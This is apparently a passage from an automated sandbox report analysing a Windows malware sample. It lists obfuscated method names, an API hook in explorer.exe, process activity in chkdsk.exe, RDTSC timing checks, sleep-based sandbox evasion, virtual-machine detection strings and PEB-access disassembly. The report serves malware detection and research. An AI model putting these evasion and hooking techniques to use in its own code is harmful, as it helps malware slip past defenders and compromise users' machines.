          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, fc1syvrZC5gZWu7QYT.csHigh entropy of concatenated method names: 'GMFIaCAIPd', 'og6I1VhrPp', 'EFjEpCppb0', 'Nu3ED2gjxU', 'mWrEjvPoNg', 'JRoEQUCYYc', 'nvPEZvAc4o', 'DsQE45QQVf', 'UHoEmSJG3k', 'nHaE0MBB73'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, UChBqsYrpZQR7u9Ord.csHigh entropy of concatenated method names: 'nZaXqUAXhT', 'TVVXywLpf6', 'LWo7OE8HaX', 'RMh7HvTKFR', 'mrfXsjV1OL', 'MbXXFSb60a', 'HGcXTnWFHN', 'xfpXiWJvZg', 'xarXRZXfPS', 'NRWXvRwBAK'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, D2VNgRut5RiPfAFHhQ.csHigh entropy of concatenated method names: 'MAIxcjatDr', 'zvnxositx7', 'QpQxNVhjM1', 'EiYxEL0R5D', 'KqqxIaGDAA', 'mKoxlANCXt', 'yKXxkWJSmc', 'Bbaxu5tl8T', 'tCEx3crQI9', 'fUYxKdtLj5'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, Wa22wZnN8PMDvgWANM.csHigh entropy of concatenated method names: 'HUaECJtMj9', 'JYXEeOrnLm', 'bkWEdc5eBe', 'xDJEnUpRiW', 'V1fEABq4MD', 'v12EP3NUxQ', 'YcPEXcnyl2', 'aOqE78s67t', 'qR5E929JUE', 'L1gEtAqawS'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, gsGG9h2imcMQk8g6VW.csHigh entropy of concatenated method names: 'UapgT2uMV', 'IuECQx031', 'v5UeTdbtp', 'tEX1UxyY7', 'eR7nrflTg', 'dvBrgVHn6', 'GqCeqf6JDQgx3fxcYF', 'LP5QGNRwBMrSI9vWjh', 'MRi7OrDB0', 'vEXtk1uaY'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, iJDPmLi792wIihmm0S.csHigh entropy of concatenated method names: 'VJKA0k8Za6', 'Q21AFRlIv6', 'CDvAij9nWF', 'VHfAR34MrD', 'PUZALweoyA', 'SCUApssOA9', 'JGqADZKYeX', 'wSLAjQ5Z3l', 'X01AQoRr44', 'lQ9AZ4Z58c'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, EAjG53yMXMH4Na5kAU.csHigh entropy of concatenated method names: 'B989H70VcI', 'COp9x0nRxG', 'hFK9WN7gss', 'B0t9oKYLUo', 'AoQ9NNyd3W', 'Jl79IRqXie', 'N449lvFduj', 'J7x753gmFH', 'fQX7qsskxD', 'Ypk76bOFUc'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, Rcw6LiW7G7FubI4r8Z.csHigh entropy of concatenated method names: 'WCiHkOOAOy', 'd7dHuSeWpw', 'LN8HKPMDvg', 'eANHMMoc1s', 'k7QHAYTaO5', 'LVtHP3Q2Hj', 'yooa2WVQtOSnaaMqeb', 'ellSkGk5xZrOwP8lli', 'PVDHHN8RKK', 'r2cHxXHokp'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, yaCCP8NbceojIaVCpL.csHigh entropy of concatenated method names: 'Dispose', 'kgBH6v1p7J', 'JyO2L8TY0C', 'uM7YYaA23p', 'm8SHyibYku', 'XTLHzwQWwb', 'ProcessDialogKey', 'Jyy2OUgUbV', 'lv02HlYpTj', 'CiE22nAjG5'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, Tk6xtvZ61SwFK2ro9t.csHigh entropy of concatenated method names: 'RjnkoY2xiN', 'ytNkEX9McG', 'Pt9kll2Eeo', 'FXtly374QI', 'FKGlzLk4T1', 'X0MkOYwHuG', 'YdYkHXkLxy', 'VFAk2bnXDl', 'neYkxQ5ahu', 'aSjkW5C8Bl'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, QOOAOydx7dSeWpwTgP.csHigh entropy of concatenated method names: 'guANi823eH', 'S30NRQqdBf', 'qvDNvEoAqr', 'vaANVdliMU', 'TkuNGsiMER', 'OKDNYXCHJo', 'VYNN5MsMLo', 'qXuNq9Zksl', 'kaIN6MhxNR', 'gveNyydDd2'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, bO3xW0vMFVOE43XmPQ.csHigh entropy of concatenated method names: 'ToString', 'U0WPseRCWX', 'qkuPL9kqhZ', 'myvPpc8Ipw', 'TI1PDSEeSA', 'B6qPjd8kmR', 'xCMPQLvyII', 'vrJPZOWI3g', 'WuyP4488DZ', 'l6CPmOTroQ'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, AO5ZVtb3Q2HjxwUenm.csHigh entropy of concatenated method names: 'HSelcIgdn7', 'EZclNEWB9X', 'otGlIlc8A3', 'Ma4lkB0kdK', 'KDPlunD2AN', 'aGtIGWlOap', 'm3NIY0SSqR', 'X0TI5BhP9L', 'QwpIqFcUQK', 'NgvI6cMs5e'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, PwWgaiHx3Tv5t3uEt4D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GmktiSKuJP', 'Uv7tRZZsOt', 'pcptvhUZGy', 'jsXtVHeKq6', 'nastGRum32', 'sKntYuSTWR', 'IDAt5xZbTs'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, O3yaNvmRc5AcFLPgkk.csHigh entropy of concatenated method names: 'R4hkUsHo1G', 'WTYkw0Snac', 'ATekgFNFx7', 'W6lkCInjlv', 'vGNkaYG7XN', 'vYfkenY0im', 'nNwk19trGh', 'dAMkdr0ile', 'zfxkn3AFGf', 'rankrJlK9b'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, y8h2NmHHHyiSIqBFoH2.csHigh entropy of concatenated method names: 'ToString', 'E2Ptx75jpa', 'bUktWEOxjL', 'uBytc6bthg', 'L8EtoywfwS', 'xFPtNCpBEd', 'zwRtEjDYXk', 'aXbtIRCb9I', 'bsPllC1OKFiJYYu3Vnp', 'BNESyR1quKQ5Ro84mhM'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, B16NMlTDV9sA6BMlFA.csHigh entropy of concatenated method names: 'mIuBd0JMIZ', 'Q80Bn0TSRr', 'o03Bbg5JXf', 'GJLBLVjHUH', 'IxjBDgUDrK', 'SX0Bj4lxLC', 'TYsBZpPqB1', 'odpB4IPBaW', 'csXB0Wvpun', 'AkTBss4OO4'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, pEtVi5z346glyXaolq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MgU9BE1qKF', 'TNy9AE0u0p', 'PIn9P7p401', 'wfU9Xp5x28', 'Jds97v8wJk', 'h1e99wJ4gP', 't7m9t0Qa3p'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, YUgUbV63v0lYpTjeiE.csHigh entropy of concatenated method names: 'wDR7bfyxwG', 'xQg7LSZ8C0', 'yaP7pYweyC', 'rUI7DY78WN', 'B9P7iVFOh3', 'LSw7jPx3vp', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, wSibYkqu6TLwQWwbjy.csHigh entropy of concatenated method names: 'Nij7obiGFa', 'GkH7NIPPFO', 'HE37EsBO9l', 'GSQ7IDC6NI', 'sgs7ly1ZMN', 'sa27kf9jnc', 'BeB7uFJyWH', 'KB473jR4dC', 'Gnv7KfKcDj', 'GeZ7M3ikOX'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, xQMMR4HOvDpBWHNtOVk.csHigh entropy of concatenated method names: 'b3q9U7Jj9T', 'DUW9wUDTTw', 'HRf9gWXGDq', 'bS79CrxOR1', 'q1s9a6vVdX', 'yaJ9evGlCt', 'raL91Qhitp', 'Wit9djHCHm', 'tli9nCc5an', 'jqX9rOkyVG'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, fc1syvrZC5gZWu7QYT.csHigh entropy of concatenated method names: 'GMFIaCAIPd', 'og6I1VhrPp', 'EFjEpCppb0', 'Nu3ED2gjxU', 'mWrEjvPoNg', 'JRoEQUCYYc', 'nvPEZvAc4o', 'DsQE45QQVf', 'UHoEmSJG3k', 'nHaE0MBB73'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, UChBqsYrpZQR7u9Ord.csHigh entropy of concatenated method names: 'nZaXqUAXhT', 'TVVXywLpf6', 'LWo7OE8HaX', 'RMh7HvTKFR', 'mrfXsjV1OL', 'MbXXFSb60a', 'HGcXTnWFHN', 'xfpXiWJvZg', 'xarXRZXfPS', 'NRWXvRwBAK'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, D2VNgRut5RiPfAFHhQ.csHigh entropy of concatenated method names: 'MAIxcjatDr', 'zvnxositx7', 'QpQxNVhjM1', 'EiYxEL0R5D', 'KqqxIaGDAA', 'mKoxlANCXt', 'yKXxkWJSmc', 'Bbaxu5tl8T', 'tCEx3crQI9', 'fUYxKdtLj5'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, Wa22wZnN8PMDvgWANM.csHigh entropy of concatenated method names: 'HUaECJtMj9', 'JYXEeOrnLm', 'bkWEdc5eBe', 'xDJEnUpRiW', 'V1fEABq4MD', 'v12EP3NUxQ', 'YcPEXcnyl2', 'aOqE78s67t', 'qR5E929JUE', 'L1gEtAqawS'
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, gsGG9h2imcMQk8g6VW.csHigh entropy of concatenated method names: 'UapgT2uMV', 'IuECQx031', 'v5UeTdbtp', 'tEX1UxyY7', 'eR7nrflTg', 'dvBrgVHn6', 'GqCeqf6JDQgx3fxcYF', 'LP5QGNRwBMrSI9vWjh', 'MRi7OrDB0', 'vEXtk1uaY'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE1
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: Process Memory Space: 881SP1exr1.exe PID: 7264, type: MEMORYSTR
          Source: C:\Users\user\Desktop\881SP1exr1.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\881SP1exr1.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000005049904 second address: 000000000504990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000005049B6E second address: 0000000005049B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-13929
          Source: C:\Users\user\Desktop\881SP1exr1.exe TID: 7288Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7996Thread sleep count: 9626 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7996Thread sleep time: -19252000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7996Thread sleep count: 315 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7996Thread sleep time: -630000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7604Thread sleep count: 178 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7604Thread sleep time: -356000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7604Thread sleep count: 9790 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7604Thread sleep time: -19580000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Users\user\Desktop\881SP1exr1.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9626Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 876Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeWindow / User API: threadDelayed 9790Jump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 1.8 %
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000003.00000002.4095376917.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000002.4094650297.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000003.00000002.4094650297.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000003.00000002.4095376917.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000000.1645900730.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.1652554894.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000003.00000002.4094650297.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000003.00000002.4094650297.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106395909.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4094650297.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106395909.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.1652554894.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000003.00000002.4092507766.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000003.00000000.1650634865.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000003.00000000.1645900730.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000000.1645900730.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A4144 mov eax, dword ptr fs:[00000030h]2_2_014A4144
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A4144 mov eax, dword ptr fs:[00000030h]2_2_014A4144
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A4144 mov ecx, dword ptr fs:[00000030h]2_2_014A4144
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A4144 mov eax, dword ptr fs:[00000030h]2_2_014A4144
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A4144 mov eax, dword ptr fs:[00000030h]2_2_014A4144
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A8158 mov eax, dword ptr fs:[00000030h]2_2_014A8158
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01416154 mov eax, dword ptr fs:[00000030h]2_2_01416154
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01416154 mov eax, dword ptr fs:[00000030h]2_2_01416154
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140C156 mov eax, dword ptr fs:[00000030h]2_2_0140C156
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E4164 mov eax, dword ptr fs:[00000030h]2_2_014E4164
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E4164 mov eax, dword ptr fs:[00000030h]2_2_014E4164
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BE10E mov eax, dword ptr fs:[00000030h]2_2_014BE10E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BE10E mov ecx, dword ptr fs:[00000030h]2_2_014BE10E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BE10E mov eax, dword ptr fs:[00000030h]2_2_014BE10E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BE10E mov eax, dword ptr fs:[00000030h]2_2_014BE10E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BE10E mov ecx, dword ptr fs:[00000030h]2_2_014BE10E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BE10E mov eax, dword ptr fs:[00000030h]2_2_014BE10E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BE10E mov eax, dword ptr fs:[00000030h]2_2_014BE10E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BE10E mov ecx, dword ptr fs:[00000030h]2_2_014BE10E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BE10E mov eax, dword ptr fs:[00000030h]2_2_014BE10E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BE10E mov ecx, dword ptr fs:[00000030h]2_2_014BE10E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BA118 mov ecx, dword ptr fs:[00000030h]2_2_014BA118
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BA118 mov eax, dword ptr fs:[00000030h]2_2_014BA118
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BA118 mov eax, dword ptr fs:[00000030h]2_2_014BA118
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BA118 mov eax, dword ptr fs:[00000030h]2_2_014BA118
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D0115 mov eax, dword ptr fs:[00000030h]2_2_014D0115
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01440124 mov eax, dword ptr fs:[00000030h]2_2_01440124
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D61C3 mov eax, dword ptr fs:[00000030h]2_2_014D61C3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D61C3 mov eax, dword ptr fs:[00000030h]2_2_014D61C3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148E1D0 mov eax, dword ptr fs:[00000030h]2_2_0148E1D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148E1D0 mov eax, dword ptr fs:[00000030h]2_2_0148E1D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0148E1D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148E1D0 mov eax, dword ptr fs:[00000030h]2_2_0148E1D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148E1D0 mov eax, dword ptr fs:[00000030h]2_2_0148E1D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E61E5 mov eax, dword ptr fs:[00000030h]2_2_014E61E5
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014401F8 mov eax, dword ptr fs:[00000030h]2_2_014401F8
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01450185 mov eax, dword ptr fs:[00000030h]2_2_01450185
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014CC188 mov eax, dword ptr fs:[00000030h]2_2_014CC188
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014CC188 mov eax, dword ptr fs:[00000030h]2_2_014CC188
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B4180 mov eax, dword ptr fs:[00000030h]2_2_014B4180
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B4180 mov eax, dword ptr fs:[00000030h]2_2_014B4180
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149019F mov eax, dword ptr fs:[00000030h]2_2_0149019F
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149019F mov eax, dword ptr fs:[00000030h]2_2_0149019F
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149019F mov eax, dword ptr fs:[00000030h]2_2_0149019F
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149019F mov eax, dword ptr fs:[00000030h]2_2_0149019F
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140A197 mov eax, dword ptr fs:[00000030h]2_2_0140A197
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140A197 mov eax, dword ptr fs:[00000030h]2_2_0140A197
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140A197 mov eax, dword ptr fs:[00000030h]2_2_0140A197
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01412050 mov eax, dword ptr fs:[00000030h]2_2_01412050
